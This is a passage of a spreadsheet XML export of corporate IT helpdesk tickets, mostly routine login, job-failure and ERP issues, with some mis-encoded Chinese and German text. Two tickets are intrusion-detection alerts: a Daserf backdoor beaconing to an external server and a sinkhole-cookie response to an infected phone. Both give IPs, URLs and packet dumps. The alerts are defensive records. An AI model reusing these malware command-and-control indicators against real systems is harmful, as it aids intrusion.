    <s v="_x000d__x000a__x000d__x000a_received from: byrljshv.bwvmophd@gmail.com_x000d__x000a__x000d__x000a_to the concerned,_x000d__x000a__x000d__x000a_i am unable to access to the collaboration_platform. (_x000d__x000a_please resolve it at the earliest._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="glwtihcj lymcgjhd"/>
    <x v="15"/>
  </r>
  <r>
    <s v="aiuw8911994 india patching_antivirus_sw desktop server is offline"/>
    <s v="this pc is offline since 19th sept"/>
    <s v="fohvgnkd stfmcapj"/>
    <x v="18"/>
  </r>
  <r>
    <s v="order products online problem"/>
    <s v="from: -ebusiness service _x000a_sent: wednesday, september 21, 2016 11:39 am_x000a_to: jfwvuzdn xackgvmd_x000a_cc: nwfodmhc exurcwkm_x000a_subject: radgthika: order products online problem_x000a__x000a_hello,_x000a__x000a_the issue is that your userid is locked in erp SID_34 and in erp SID_39._x000a_you need to go to the password_management_tool password manager and first select the option &quot;unlock accounts&quot;, after that select the option &quot;change password&quot;_x000a_once that is completed successfully, you should logon to distributor_tool with that new password._x000a__x000a_           _x000a__x000a__x000a_mit freundlichem gruÃŸ / kind "/>
    <s v="fkdazsmi yecbrofv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erpæ— æ³•ç™»å½•ï¼Œæç¤ºlogon balancing error 88 ."/>
    <s v="gartryhuï¼š_x000d__x000a_ä½ å¥½ï¼Œä»Žæ˜¨å¤©æ™šä¸Šå¼€å§‹ï¼Œæˆ‘çš„erpç™»å½•æŒç»­å‡ºçŽ°ä»¥ä¸‹é”™è¯¯ï¼Œè¯·å¸®å¿™çœ‹çœ‹ä»€ä¹ˆåŽŸå› ï¼_x000d__x000a_åœ¨å®¶é‡Œvpnå’Œå…¬å¸ç›´æŽ¥ç™»å½•éƒ½æ˜¯è¿™æ ·ï¼_x000d__x000a_å¤šè°¢äº†_x000d__x000a_best "/>
    <s v="agzswjku kqwofdjl"/>
    <x v="31"/>
  </r>
  <r>
    <s v="security incidents - ( #in33932723 ) : possible daserf trojan (apt activity) - leengineering_tool-201-zhm"/>
    <s v="source ip: 10.44.63.52_x000d__x000a_source hostname: leengineering_tool-201-zhm_x000d__x000a_destination ip: 218.84.244.31_x000d__x000a_system name :_x000d__x000a_user  name:_x000d__x000a_location :_x000d__x000a_sep , sms status :_x000d__x000a_field sales user ( yes / no) :  _x000d__x000a_dsw event log:see below_x000d__x000a_--------------------------------------------------------------------------------------------------------------------------------------_x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_event id: 94845494_x000d__x000a_event summary: 52798 vid75839 daserf backdoor phoning home (apt activity)_x000d__x000a_occurrence count: 1_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 10.44.63.52_x000d__x000a_source hostname: leengineering_tool-201-zhm_x000d__x000a_source port: 3475_x000d__x000a_destination ip: 218.84.244.31_x000d__x000a_destination port: 80_x000d__x000a_destination ip geolocation: urumqi, chn_x000d__x000a_connection directionality: outgoing_x000d__x000a_protocol: tcp_x000d__x000a_http method: get_x000d__x000a_user agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)_x000d__x000a_host: es.f.360.cn_x000d__x000a_full url path: /stats.php_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 80.68.49.4169_x000d__x000a_device name: isensor05.company.com_x000d__x000a_log time: 2016-09-20 at 23:58:57 utc_x000d__x000a_action: not blocked_x000d__x000a_vendor eventid: 591748_x000d__x000a_cvss score: -1 _x000d__x000a_vendor priority: 1_x000d__x000a_vendor version: 7_x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 2174626_x000d__x000a_inspector rule id: 277082_x000d__x000a_inspector event id: 891373519_x000d__x000a_ontology id: 200020003203759120_x000d__x000a_event type id: 200020003203703260_x000d__x000a_agent id: 102835_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_[**] [1:21163809:2] 52798 vid75839 daserf backdoor phoning home (apt activity) [**]_x000d__x000a_[classification: none] [priority: 1] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000d__x000a_[sensor id: 606873][event id: 591748][time: 2585526048.971531]_x000d__x000a_[src ip: 10.44.63.52][dst ip: 218.84.244.31][sport/itype: 3475][dport/icode: 80][proto: 6]_x000d__x000a_09/20/2016-23:58:57.97153sartlgeo lhqksbdx0.44.63.52:3475 -&gt; 218.84.244.31:80_x000d__x000a_tcp ttl:61 tos:0x0 id:44699 iplen:20 dgmlen:180 df_x000d__x000a_***ap*** seq: 0x85f0af80 ack: 0xf50449c6 win: 0xb5c9 tcplen: 20_x000d__x000a_==pcap 1==_x000d__x000a__x000d__x000a__x000d__x000a_[ex http_uri 9: /stats.php]_x000d__x000a__x000d__x000a_[ex http_hostname 10: es.f.360.cn]_x000d__x000a__x000d__x000a_[o:security]_x000d__x000a__x000d__x000a_ascii packet(s):_x000d__x000a_==pcap 1 ascii s==_x000d__x000a_....a..w............e.....@.=.v..,?4.t.....p......i.p.......get./stats.php.http/1.1..user-agent:.mozilla/4.0.(compatible;.msie.6.0;.windows.nt.5.1;.sv1)..host:.es.f.360.cn..cache-control:.no-cache...._x000d__x000a_==pcap 1 ascii e==_x000d__x000a__x000d__x000a_hex packet(s):_x000d__x000a_==pcap 1 hex s==_x000d__x000a_000000 0c00 0000 41cd e157 0bd3 0e00 b400 0000 ....a..w........_x000d__x000a_000010 b400 0000 4500 00b4 ae9b 4000 3d06 76d4 ....e.....@.=.v._x000d__x000a_000020 0a2c 3f34 da54 f41f 0d93 0050 85f0 af80 .,?4.t.....p...._x000d__x000a_000030 f504 49c6 5018 b5c9 f190 0000 4745 5420 ..i.p.......get._x000d__x000a_000040 2f73 7461 7473 2e70 6870 2048 5454 502f /stats.php.http/_x000d__x000a_000050 312e 310d 0a55 7365 722d 4167 656e 743a 1.1..user-agent:_x000d__x000a_000060 204d 6f7a 696c 6c61 2f34 2e30 2028 636f .mozilla/4.0.(co_x000d__x000a_000070 6d70 6174 6962 6c65 3b20 4d53 4945 2036 mpatible;.msie.6_x000d__x000a_000080 2e30 3b20 5769 6e64 6f77 7320 4e54 2035 .0;.windows.nt.5_x000d__x000a_000090 2e31 3b20 5356 3129 0d0a 486f 7374 3a20 .1;.sv1)..host:._x000d__x000a_0000a0 6573 2e66 2e33 3630 2e63 6e0d 0a43 6163 es.f.360.cn..cac_x000d__x000a_0000b0 6865 2d43 6f6e 7472 6f6c 3a20 6e6f 2d63 he-control:.no-c_x000d__x000a_0000c0 6163 6865 0d0a 0d0a ache...._x000d__x000a_==pcap 1 hex e=="/>
    <s v="gzhapcld fdigznbk"/>
    <x v="47"/>
  </r>
  <r>
    <s v="security incidents - ( #in33924718 ) : possible malware infection - traffic from sinkhole domain to android-13849fa3"/>
    <s v="source ip :195.22.28.222_x000d__x000a_destination ip: 12.90.42.78296_x000d__x000a_destination hostname: android-13849fa3e9c2e1e3_x000d__x000a_destination port: 50060_x000d__x000a_user  name:_x000d__x000a_location :_x000d__x000a_sep , sms status :_x000d__x000a_field sales user ( yes / no) :  _x000d__x000a_dsw event log:see below_x000d__x000a_----------------------------------------------------------------------------------------------------_x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_event id: 84313125_x000d__x000a_event summary: 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset_x000d__x000a_occurrence count: 2_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 195.22.28.222_x000d__x000a_source port: 80_x000d__x000a_source ip geolocation: lisbon, prt_x000d__x000a_destination ip: 12.90.42.78296_x000d__x000a_destination hostname: android-13849fa3e9c2e1e3_x000d__x000a_destination port: 50060_x000d__x000a_destination mac address: 84:38:38:49:8e:8c_x000d__x000a_connection directionality: incoming_x000d__x000a_protocol: tcp_x000d__x000a_http status code: 302_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 10.16.4.16_x000d__x000a_device name: isensor04.company.com_x000d__x000a_log time: 2016-09-20 at 14:52:40 utc_x000d__x000a_action: not blocked_x000d__x000a_vendor eventid: 658837_x000d__x000a_cvss score: -1 _x000d__x000a_vendor priority: 2_x000d__x000a_vendor version: 7_x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 699417_x000d__x000a_inspector event id: 637894958_x000d__x000a_ontology id: 200020003203755736_x000d__x000a_event type id: 200020003203582148_x000d__x000a_agent id: 102823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2983][event id: 658837][time: 2585494271.714897]_x000d__x000a_[src ip: 195.22.28.222][dst ip: 12.90.42.78296][sport/itype: 80][dport/icode: 50060][proto: 6]_x000d__x000a_09/20/2016-14:52:40.714897 195.22.28.222:80 -&gt; 12.90.42.78296:50060_x000d__x000a_tcp ttl:55 tos:0x0 id:21367 iplen:20 dgmlen:395 df_x000d__x000a_***ap*** seq: 0x6160cb68 ack: 0x767501ef win: 0x35 tcplen: 32_x000d__x000a_tcp options (3) =&gt; nop nop ts: 4874825104 23401168 _x000d__x000a_==pcap 1==_x000d__x000a__x000d__x000a_[o:security]_x000d__x000a__x000d__x000a_[correlation_data]_x000d__x000a_sep 20 07:09:48 60.43.89.120 dhcpd[31183]: dhcpack on 12.90.42.78296 to 84:38:38:49:8e:8c (android-13849fa3e9c2e1e3) via eth2 relay 10.16.16.2 lease-duration 604800 (renew)_x000d__x000a__x000d__x000a_ascii packet(s):_x000d__x000a_==pcap 1 ascii s==_x000d__x000a_....8m.w............e...sw@.7..-.........p..a`.hvu.....5.........u.-....http/1.1.302.moved.temporarily..server:.nginx..date:.tue,.20.sep.2016.14:52:40.gmt..content-type:.text/html..connection:.close..set-cookie:.anbtr=26fd9b636b17e81f718dba282f5d46eb;.domain=.allinvest.us..location:._x000d__x000a_==pcap 1 ascii e==_x000d__x000a__x000d__x000a_hex packet(s):_x000d__x000a_==pcap 1 hex s==_x000d__x000a_000000 0c00 0000 384d e157 91e8 0a00 8b01 0000 ....8m.w........_x000d__x000a_000010 8b01 0000 4500 018b 5377 4000 3706 f42d ....e...sw@.7..-_x000d__x000a_000020 c316 1cde 0a10 10c4 0050 c38c 6160 cb68 .........p..a`.h_x000d__x000a_000030 7675 01ef 8018 0035 fcf2 0000 0101 080a vu.....5........_x000d__x000a_000040 e055 b82d 00bd 0ea9 4854 5450 2f31 2e31 .u.-....http/1.1_x000d__x000a_000050 2033 3032 204d 6f76 6564 2054 656d 706f .302.moved.tempo_x000d__x000a_000060 7261 7269 6c79 0d0a 5365 7276 6572 3a20 rarily..server:._x000d__x000a_000070 6e67 696e 780d 0a44 6174 653a 2054 7565 nginx..date:.tue_x000d__x000a_000080 2c20 3230 2053 6570 2032 3031 3620 3134 ,.20.sep.2016.14_x000d__x000a_000090 3a35 323a 3430 2047 4d54 0d0a 436f 6e74 :52:40.gmt..cont_x000d__x000a_0000a0 656e 742d 5479 7065 3a20 7465 7874 2f68 ent-type:.text/h_x000d__x000a_0000b0 746d 6c0d 0a43 6f6e 6e65 6374 696f 6e3a tml..connection:_x000d__x000a_0000c0 2063 6c6f 7365 0d0a 5365 742d 436f 6f6b .close..set-cook_x000d__x000a_0000d0 6965 3a20 616e 6274 723d 3236 6664 3962 ie:.anbtr=26fd9b_x000d__x000a_0000e0 3633 3662 3137 6538 3166 3731 3864 6261 636b17e81f718dba_x000d__x000a_0000f0 3238 3266 3564 3436 6562 3b20 646f 6SID_26 282f5d46eb;.doma_x000d__x000a_000100 696e 3d2e 616c 6c69 6e76 6573 742e 7573 in=.allinvest.us_x000d__x000a_000110 0d0a 4c6f 6361 7469 6f6e 3a20 6874 7470 ..location:.http_x000d__x000a_000120 3a2f 2f78 7373 6f2e 6865 6c70 2e61 6c6c ://xsso.help.all_x000d__x000a_000130 696e 7665 7374 2e75 732f 3236 6664 3962 invest.us/26fd9b_x000d__x000a_000140 3633 3662 3137 6538 3166 3731 3864 6261 636b17e81f718dba_x000d__x000a_000150 3238 3266 3564 3436 6562 0d0a 0d0a 476f 282f5d46eb....go_x000d__x000a_000160 2068 7474 703a 2f2f 7873 736f 2e68 656c ._x000d__x000a_000170 702e 616c 6c69 6e76 6573 742e 7573 2f32 p.allinvest.us/2_x000d__x000a_000180 3666 6439 6236 3336 6231 3765 3831 6637 6fd9b636b17e81f7_x000d__x000a_000190 3138 6462 6132 3832 6635 6434 3665 62 18dba282f5d46eb_x000d__x000a_==pcap 1 hex e=="/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="folder access request"/>
    <s v="(\\HostName_768) (t:\\finance\global bank bals fy17_x000d__x000a__x000d__x000a_group : lhqfinglbalfy17fc_x000d__x000a_owner : pjxclyhs fcniljtu_x000d__x000a_access : full control"/>
    <s v="phvkowml azbtkqwx"/>
    <x v="33"/>
  </r>
  <r>
    <s v="job Job_495 failed in job_scheduler at: 09/21/2016 03:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_495 failed in job_scheduler at: 09/21/2016 03:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="do not have permission to ess portal. at "/>
    <s v="please reach out to me for more information if needed."/>
    <s v="ytwmgpbk cpawsihk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="mm#3342477 | mm#5270584 | mm#5270486 | mm#4166346"/>
    <s v="hi_x000d__x000a__x000d__x000a_please see below pricing team comments and advise on above mentioned materials ;-_x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a_"/>
    <s v="kfhnmtgi boxmklnp"/>
    <x v="12"/>
  </r>
  <r>
    <s v="batch number is not appearing in pdf output of engineering_tool"/>
    <s v="dear bhughjdra,_x000a__x000a_this is a good enquiry. agree batch number view is important too._x000a__x000a_best "/>
    <s v="vkezwolt fgnqzeai"/>
    <x v="25"/>
  </r>
  <r>
    <s v="job Job_481 failed in job_scheduler at: 09/21/2016 03:13:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_481 failed in job_scheduler at: 09/21/2016 03:13:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="e-time ç³»ç»Ÿjavaæ›´æ–°-è½¬è´ºæ­£å¹³"/>
    <s v="_x000a__x000a_received from: tuqrvowp.fxmzkvqo@gmail.com_x000a__x000a_dear heï¼Œ_x000a__x000a_é’±å”é‘«å’Œåˆ˜æ™“å†¬e-timeç³»ç»Ÿçš„javeéœ€è¦æ›´æ–°ã€‚_x000a_è°¢è°¢_x000a__x000a__x000a__x000a_tuqrvowp fxmzkvqo é’±å”é‘«_x000a_human resources_x000a_tuqrvowp.fxmzkvqo@gmail.com&lt;mailto:tuqrvowp.fxmzkvqo@gmail.com&gt;_x000a__x000a__x000a_ä¸Šæµ·å‡é˜³è¶…å¾®ç²‰æœ‰é™å…¬å¸_x000a_ä¸Šæµ·å¸‚å¥‰è´¤åŒºé™ˆæ¡¥è·¯1508å·_x000a_é‚®ç¼–ï¼š201400_x000a__x000a_"/>
    <s v="tuqrvowp fxmzkvqo"/>
    <x v="30"/>
  </r>
  <r>
    <s v="distributor_tool account identification problem"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pgeknaxy.usokqprd@gmail.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a__x000d__x000a_as you can see at the below sreenshot, my distributor_tool account did not identified for sales organisation. so i can not do anything at the distributor_tool._x000d__x000a__x000d__x000a_could you please help me for this issue?_x000d__x000a__x000d__x000a_"/>
    <s v="pgeknaxy usokqprd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="maschinenstillstand ma 7 kesm , fernwartung notwendig; z. hd. herr himghtmelreich"/>
    <s v="maschinenstillstand ma 7 kesm , fernwartung notwendig_x000a_tel.  herr teichgrÃ¤ber    "/>
    <s v="fiwaltqr utykjmwi"/>
    <x v="32"/>
  </r>
  <r>
    <s v="job Job_1390 failed in job_scheduler at: 09/21/2016 02:54:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1390 failed in job_scheduler at: 09/21/2016 02:54:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1332 failed in job_scheduler at: 09/21/2016 02:51:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1332 failed in job_scheduler at: 09/21/2016 02:51:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="re: need a little help--please"/>
    <s v="_x000a__x000a_received from: bcefayom.lzhwcgvb@gmail.com_x000a__x000a_shathyra, lunjuws_x000a__x000a_zd13 is the delivery output type which was developed for baker huges when usa went live on erp.._x000a__x000a_delivery note output type &quot;zdus&quot; will be added automatically as soon as the delivery note is created if there is no specific customer specific output type maintained._x000a__x000a_in this scenario since we have already a customer specific output &quot;zd13&quot; maintained in output config, &quot;zdus&quot; will be automatically replaced with &quot;zd13&quot; &amp; it will print immediately in &quot;hx08&quot;printer. (printer hx08 has been defined as default printer for sales org 1101 and customer 81917193 combination)._x000a_[cid:image003.png@01SID_353fb.6857f6c0]_x000a__x000a_the complexity is that we are shipping to customer &quot;81917193&quot; from both usa and usa._x000a__x000a_can you please confirm if we are using z_chk to print the delivery note usa._x000a__x000a_lunjuws: we need your help to check with usa team if they are using z_chk for printing delivery note.._x000a__x000a_based on the above information we shall check on the possibilities and let you know.._x000a__x000a_chandruhdty_x000a_[ a.n ]_x000a_senior analyst - global it _x000a_---------------------------------------------------------_x000a_bcefayom.lzhwcgvb@gmail.com&lt;mailto:bcefayom.lzhwcgvb@gmail.com&gt;_x000a__x000a_please don't print this email unless you really need to - this will preserve trees on planet earth._x000a__x000a_from: damuphws arkulcoi_x000a_sent: 20 september 2016 04:35_x000a_to: smxoklny hbecskgl_x000a_subject: need a little help--please_x000a__x000a_sorry, i never email you to just say hey-how's it going...but you know how it's going-i'm sure.....   :)_x000a__x000a_my dilemma is-since we have started shipping to bakyhrer huhuyghes-our delivery notes are still printing to usa.  who do i need to contact about this?  if it is the help desk-i'm not sure what/how to ask for it.  they aren't as easy to explain stuff to as you are...  we are wanting the transaction &quot;zdus&quot; to be added to  the delivery output screen, instead of zd13.    usa used zd13   we were using zd12   but zdus is what we really need to be using._x000a_  if i have talked myself in circles   let me know and i'll try to explain it a little better._x000a__x000a_this is an example of  what we want_x000a_[cid:image001.png@01SID_353fa.f482f2e0]_x000a__x000a_this is what we get right now  after we go in and add the zd12 to get a delivery note to print here---_x000a_[cid:image002.png@01SID_353fa.f482f2e0]_x000a__x000a_  "/>
    <s v="bcefayom lzhwcgvb"/>
    <x v="17"/>
  </r>
  <r>
    <s v="job Job_1378 failed in job_scheduler at: 09/21/2016 02:43:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1378 failed in job_scheduler at: 09/21/2016 02:43:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="lhqSID_1856-new"/>
    <s v="_x000a__x000a_received from: ctvaejbo.mjcerqwo@gmail.com_x000a__x000a_hi,_x000a__x000a_i'm trying to install a license server on this new server._x000a__x000a_i was just logged onto it, but it now appears to be unavailable?_x000a__x000a_pollaurid d phlpiops_x000a_manager engineering technology_x000a__x000a__x000a_"/>
    <s v="ctvaejbo mjcerqwo"/>
    <x v="11"/>
  </r>
  <r>
    <s v="leantracker anmeldung funktioniert nicht"/>
    <s v="lean tracker Ã¶ffnet nicht. fehlermeldung erscheint."/>
    <s v="hwfckjzs abxdmyho"/>
    <x v="0"/>
  </r>
  <r>
    <s v="minitab to be installed"/>
    <s v="name:wnorzsyv mdflqwxg_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:wnorzsyv.mdflqwxg@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:minitab to be installed"/>
    <s v="wnorzsyv mdflqwxg"/>
    <x v="18"/>
  </r>
  <r>
    <s v="erp access issue: please reset SID_34 password for pandepv"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):_x000d__x000a__x000d__x000a_enter user id of user having the issue:_x000d__x000a__x000d__x000a_transaction code(s) the user needs or was working with:_x000d__x000a__x000d__x000a_describe the issue:_x000d__x000a__x000d__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000d__x000a__x000d__x000a_provide access the same as this other user:"/>
    <s v="nrugzxkl lohqkvry"/>
    <x v="19"/>
  </r>
  <r>
    <s v="windows account locked"/>
    <s v="windows account locked"/>
    <s v="gxawkhsq xqrczonv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account locked"/>
    <s v="windows account locked"/>
    <s v="lqxhoyic ojxkuftc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="batch number is not appearing in pdf output of engineering_tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xqkydoat.bveiyclr@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a_refer below snapshot of pdf output of engineering_tool._x000d__x000a_batch number is not appearing in pdf output._x000d__x000a_[cid:image008.jpg@01SID_35366.4a922790]_x000d__x000a__x000d__x000a_why batch number is important?_x000d__x000a_in case of variation in tool life from batch to batch, customer raises the complaint. we send ccif with engineering_tool. in engineering_tool software we enter batch number but when i download pdf, it doesn't show batch number. without batch number, analysis cannot be done. that's why it's very important to capture batch number in engineering_tool pdf output._x000d__x000a__x000d__x000a_for your necessary action._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="xqkydoat bveiyclr"/>
    <x v="52"/>
  </r>
  <r>
    <s v="network outage: poncacity -schlumhdyhter-dmvpn-rtr is down since 11:56 pm et on 09/20."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________ 11:56 pm et on 09/20.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na______     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ____no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wlan guest access for cantine germany"/>
    <s v="from: xvwchsdg pladjmxt _x000a_sent: tuesday, september 20, 2016 5:12 pm_x000a_to: dwfiykeo argtxmvcumar3_x000a_cc: thomklmas woehyl_x000a_subject: wlan guest access for cantine germany_x000a__x000a_hello manjgtiry,_x000a__x000a_we are having issues connecting to guest wlan with an 3rd party adapter which has worked before (_x000a__x000a_built in wifi adapter from their notebook is working just fine. both of the adapters are able to find the ssid._x000a__x000a_is it possible that the mac-address of the edimax is in some kind of quarantine? (74-da-38-3b-f1-58)_x000a__x000a_best "/>
    <s v="xvwchsdg pladjmxt"/>
    <x v="3"/>
  </r>
  <r>
    <s v="job Job_1374 failed in job_scheduler at: 09/21/2016 00:32:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1374 failed in job_scheduler at: 09/21/2016 00:32:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for xgrhplvk.coejktzn@gmail.com"/>
    <s v="from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] _x000a_sent: wednesday, september 21, 2016 8:24 am_x000a_to: nwfodmhc exurcwkm_x000a_cc: tiyhum kuyiomar_x000a_subject: request to reset microsoft online services password for xgrhplvk.coejktzn@gmail.com_x000a_importance: high_x000a__x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ xgrhplvk.coejktzn@gmail.com _x000a_â€¢ first name: babhjbu _x000a_â€¢ last name: gdgy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afijkocw rjtxslpa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked"/>
    <s v="erp SID_34 account locked"/>
    <s v="wvaksnpy vnixhytj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to access -inq industrial (-inq.industrial@company.com)"/>
    <s v="_x000d__x000a__x000d__x000a_received from: muqdlobv.qflsdahg@gmail.com_x000d__x000a__x000d__x000a_team,_x000d__x000a__x000d__x000a_i am not able access to -inq industrial (-inq.industrial@company.com&lt;mailto:-inq.industrial@company.com&gt;) for which we receive enquiries about special products._x000d__x000a_from past one week above mentioned shared email box is not functioning for me, whereas other members are able to access the same._x000d__x000a_so i kindly request you to take it upon high priority and confirm back._x000d__x000a__x000d__x000a_"/>
    <s v="muqdlobv qflsdahg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="expense report -  receipts issue"/>
    <s v="one of my employees sent his expenses to me today and there were notes all over it that there were no receipts.  he has the receipts for everything.  how should this be handled?"/>
    <s v="cyxulwmi lygbewdi"/>
    <x v="9"/>
  </r>
  <r>
    <s v="two billings were not posted to gl 9169221558 6th sept &amp; 9169338118 18th sept"/>
    <s v="name:jashtyckie_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:jacyjddwline.yotywdsef@company.com_x000a_customer number:_x000a_telephone:_x000a_summary:two billings were not posted to gl 9169221558 6th sept &amp; 9169338118 18th sept"/>
    <s v="fksahqzc cdwhznbo"/>
    <x v="9"/>
  </r>
  <r>
    <s v="vpn will not allow access to erp"/>
    <s v="name:pfzxecbo ptygkvzl_x000d__x000a_language:_x000d__x000a_browser:microsoft internet explorer_x000d__x000a_email:pfzxecbo.ptygkvzl@gmail.com_x000d__x000a_customer number:_x000d__x000a_telephone:_x000d__x000a_summary:vpn will not allow access to erp.  this is the 3rd occurrence of the same issue."/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2555 failed in job_scheduler at: 09/20/2016 22:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2555 failed in job_scheduler at: 09/20/2016 22:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_51filesys failed in job_scheduler at: 09/20/2016 20:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_51filesys failed in job_scheduler at: 09/20/2016 20:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ç”µè¯æ•…éšœ"/>
    <s v="é“¸æ£’è½¦é—´ç”µè¯æ•…éšœï¼Œ39523850"/>
    <s v="sbkhjigv pbvlfcse"/>
    <x v="47"/>
  </r>
  <r>
    <s v="laptop can't log on"/>
    <s v="laptop can't log on"/>
    <s v="xielgjvr sqjxewmh"/>
    <x v="31"/>
  </r>
  <r>
    <s v="upsæ•…éšœ"/>
    <s v="åˆ¶ç²‰è½¦é—´3æ¥¼psfäº¤æ¢æœºå¤„upsæ•…éšœï¼Œè®¾å¤‡æ— ä»»ä½•ååº”ã€‚"/>
    <s v="agyvbnwz mxsonkdc"/>
    <x v="47"/>
  </r>
  <r>
    <s v="internal crm - auto notification, not received"/>
    <s v="crm 7611183702 - when the responsible user updated its status as &quot;final review&quot; it generally dispatch the auto-notification email to the crm owner but i have not received the notification. the key user confirmed it hasn't sent to me. reference to the attached email communication. please investigate why."/>
    <s v="hgcrtxez azoeingw"/>
    <x v="14"/>
  </r>
  <r>
    <s v="SID_1 access beathe"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uisewznr.ewtmkphs@gmail.com_x000d__x000a__x000d__x000a_hi team,_x000d__x000a__x000d__x000a_i am having issues logging into SID_1. i have reset my password in password manager, but still cannot access it. can you please assist? "/>
    <s v="uisewznr ewtmkphs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="a dell search icon is running all the time slowing the laptop down"/>
    <s v="name:danyhuie deyhtwet_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:rozsyfai.zncajubh@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:new laptop. a dell search icon is running all the time slowing the laptop down"/>
    <s v="rozsyfai zncajubh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1315 failed in job_scheduler at: 09/20/2016 18:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1315 failed in job_scheduler at: 09/20/2016 18:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="add rohhsyni lalanne to shipment notification notice.  "/>
    <s v="_x000a__x000a_received from: ibtvlfah.dtlwscma@gmail.com_x000a__x000a_add e-mail address to shipment notification for customer # 81917193_x000a_see example attached._x000a__x000a_lalanne, rohhsyni c &lt;rohhsyni.lalanne@bakheyr rjuyihes.com&gt;_x000a__x000a_"/>
    <s v="ibtvlfah dtlwscma"/>
    <x v="17"/>
  </r>
  <r>
    <s v="tax not printing on customer inwarehouse_tools"/>
    <s v="please review the attached inwarehouse_tools, both of which are the same. the one without the tax is the one the customer received.  the second one with the tax is one that i sent to myself and is billing tax. i spoke with cegtcily in the tax dept. and she is stating that she has a ticket in for this issue where tax is not printing but is calculating in erp.  please look into this issues as quickly as possible as customers are now questioning the billing difference and it is becoming an issue for our customers. "/>
    <s v="slkxgzdj wxpytevu"/>
    <x v="12"/>
  </r>
  <r>
    <s v="canadian customer inwarehouse_tools are not printing the tax amount on the inwarehouse_tools"/>
